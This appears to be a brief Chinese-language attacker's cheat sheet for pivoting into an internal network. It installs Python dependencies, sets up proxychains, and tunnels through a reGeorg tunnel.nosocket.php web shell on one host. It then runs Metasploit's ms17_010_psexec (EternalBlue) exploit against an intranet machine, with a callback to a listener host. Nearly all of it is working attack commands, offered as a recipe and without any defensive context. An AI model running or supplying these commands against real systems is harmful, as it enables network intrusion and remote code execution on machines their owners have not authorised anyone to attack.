php5.3以后没有dl函数了

# 安装setup-tools
wget https://pypi.python.org/packages/45/29/8814bf414e7cd1031e1a3c8a4169218376e284ea2553cc0822a6ea1c2d78/setuptools-36.6.0.zip#md5=74663b15117d9a2cc5295d76011e6fd1
unzip setuptools-36.6.0.zip 
cd setuptools-36.6.0
python setup.py install

# 安装urllib3
wget https://pypi.python.org/packages/3b/f0/e763169124e3f5db0926bc3dbfcd580a105f9ca44cf5d8e6c7a803c9f6b5/urllib3-1.16.tar.gz#md5=fcaab1c5385c57deeb7053d3d7d81d59
tar xvf urllib3-1.16.tar.gz  && cd urllib3-1.16/
python setup.py install

#配置代理
vi /etc/proxychains.conf
注释socks4一行
添加socks5 127.0.0.1 8888
reGeory 来打通本地和目标的通道
python reGeorgSocksProxy.py -p 8888 -u http://192.168.0.107/tunnel.nosocket.php
proxychains firefox打开浏览器测试

# 使用msf攻击内网
 proxychains msfconsole
use windows/smb/ms17_010_psexec
set rhosts 192.168.0.103
set lhost 192.168.0.110
exploit